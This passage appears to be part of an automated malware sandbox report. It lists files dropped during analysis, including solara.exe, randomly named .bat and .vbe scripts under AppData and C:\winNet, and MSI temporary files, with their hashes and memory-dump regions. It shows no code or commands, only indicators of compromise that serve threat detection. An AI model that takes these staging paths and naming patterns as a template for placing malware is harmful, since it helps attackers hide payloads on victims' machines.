                            8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                            SHA512

                            fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tl4p33kq.p4k.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi
                            Filesize

                            30.1MB

                            MD5

                            0e4e9aa41d24221b29b19ba96c1a64d0

                            SHA1

                            231ade3d5a586c0eb4441c8dbfe9007dc26b2872

                            SHA256

                            5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

                            SHA512

                            e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\solara.exe
                            Filesize

                            1.8MB

                            MD5

                            1797c0e37f4b9dd408cbf0d7bfcb7c95

                            SHA1

                            10df695351ac6074e23a3d3b4bd31a17c10fd614

                            SHA256

                            8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb

                            SHA512

                            52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat
                            Filesize

                            46B

                            MD5

                            83a7f739f51f1acd83f143afa6ec1533

                            SHA1

                            2f653f906842f8f507d02f81550eb26a35f38acc

                            SHA256

                            5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545

                            SHA512

                            c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                            Filesize

                            1.5MB

                            MD5

                            9cf4017a8383ae846a908c79a28354bf

                            SHA1

                            adbe6a02b90147431e80fc38100de42d88dd765a

                            SHA256

                            bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2

                            SHA512

                            490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe
                            Filesize

                            221B

                            MD5

                            1a3448b944b91cebda73adc5064e6286

                            SHA1

                            4f8716c6e56a675944a5f0f250947c8d45a362e1

                            SHA256

                            5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5

                            SHA512

                            b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

                            Download Submit

                          • C:\Windows\Installer\MSIBA67.tmp
                            Filesize

                            122KB

                            MD5

                            9fe9b0ecaea0324ad99036a91db03ebb

                            SHA1

                            144068c64ec06fc08eadfcca0a014a44b95bb908

                            SHA256

                            e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

                            SHA512

                            906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

                            Download Submit

                          • C:\Windows\Installer\MSIBAD6.tmp
                            Filesize

                            211KB

                            MD5

                            a3ae5d86ecf38db9427359ea37a5f646

                            SHA1

                            eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

                            SHA256

                            c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

                            SHA512

                            96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

                            Download Submit

                          • C:\Windows\Installer\MSICFB8.tmp
                            Filesize

                            297KB

                            MD5

                            7a86ce1a899262dd3c1df656bff3fb2c

                            SHA1

                            33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541

                            SHA256

                            b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c

                            SHA512

                            421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

                            Download Submit

                          • C:\winNet\ComContainerbrowserRefRuntime.exe
                            Filesize

                            1.6MB

                            MD5

                            e41ef428aaa4841f258a38dc1cc305ef

                            SHA1

                            edf3a17831e013b74479e2e635b8cf0c1b3787ce

                            SHA256

                            6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995

                            SHA512

                            a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

                            Download Submit

                          • C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat
                            Filesize

                            92B

                            MD5

                            81c6a00913630266cef3d07065db9b1f

                            SHA1

                            db6260ef38563ec05f910277af358fbaa2387154

                            SHA256

                            5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4

                            SHA512

                            a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

                            Download Submit

                          • C:\winNet\we9fgyC144zVOkGk.vbe
                            Filesize

                            215B

                            MD5

                            aa1a085aba94a5fc38c26b79a2217336

                            SHA1

                            f847af2aec7fd56fe8734ccb51d8027b9b4e817b

                            SHA256

                            f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545

                            SHA512

                            75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

                            Download Submit

                          • memory/464-323-0x00000000005C0000-0x000000000079A000-memory.dmp

                            Filesize

                            1.9MB

                            Download

                          • memory/1156-79-0x0000000005F30000-0x00000000064D4000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/1156-72-0x0000000000FB0000-0x000000000107E000-memory.dmp

                            Filesize

                            824KB

                            Download

                          • memory/1452-136-0x000001A373990000-0x000001A3739B2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/2164-275-0x000000001C4A0000-0x000000001C662000-memory.dmp

                            Filesize

                            1.8MB

                            Download

                          • memory/2164-297-0x000000001D0A0000-0x000000001D5C8000-memory.dmp

                            Filesize

                            5.2MB

                            Download

                          • memory/2576-69-0x0000000000400000-0x000000000069B000-memory.dmp

                            Filesize

                            2.6MB

                            Download

                          • memory/3148-86-0x0000000000070000-0x00000000001F4000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/3148-94-0x0000000002470000-0x000000000247E000-memory.dmp

                            Filesize

                            56KB

                            Download

                          • memory/3148-96-0x00000000024E0000-0x00000000024EC000-memory.dmp

                            Filesize

                            48KB

                            Download

                          • memory/3148-90-0x00000000022D0000-0x00000000022D8000-memory.dmp

                            Filesize

                            32KB

                            Download

                          • memory/3148-89-0x0000000002490000-0x00000000024E0000-memory.dmp

                            Filesize

                            320KB

                            Download

                          • memory/3148-91-0x0000000002440000-0x0000000002456000-memory.dmp

                            Filesize

                            88KB

                            Download

                          • memory/3148-87-0x0000000002300000-0x000000000230E000-memory.dmp

                            Filesize

                            56KB

                            Download

                          • memory/3148-92-0x00000000022E0000-0x00000000022F0000-memory.dmp

                            Filesize

                            64KB

                            Download

                          • memory/3148-93-0x0000000002460000-0x000000000246E000-memory.dmp

                            Filesize

                            56KB

                            Download

                          • memory/3148-88-0x00000000022B0000-0x00000000022CC000-memory.dmp

                            Filesize

                            112KB

                            Download

                          • memory/3148-95-0x0000000002480000-0x000000000248A000-memory.dmp

                            Filesize

                            40KB

                            Download

                          • memory/3460-301-0x0000000000F70000-0x0000000001106000-memory.dmp

                            Filesize

                            1.6MB

                            Download

                          • memory/3892-42-0x0000000000400000-0x0000000000CC7000-memory.dmp

                            Filesize

                            8.8MB

                            Download

                          • memory/4644-264-0x0000027DCA190000-0x0000027DCA1A2000-memory.dmp

                            Filesize

                            72KB

                            Download

                          • memory/4644-263-0x0000027DE2C60000-0x0000027DE2E80000-memory.dmp

                            Filesize

                            2.1MB

                            Download

                          • memory/4644-262-0x0000027DC81D0000-0x0000027DC83F1000-memory.dmp

                            Filesize

                            2.1MB

                            Download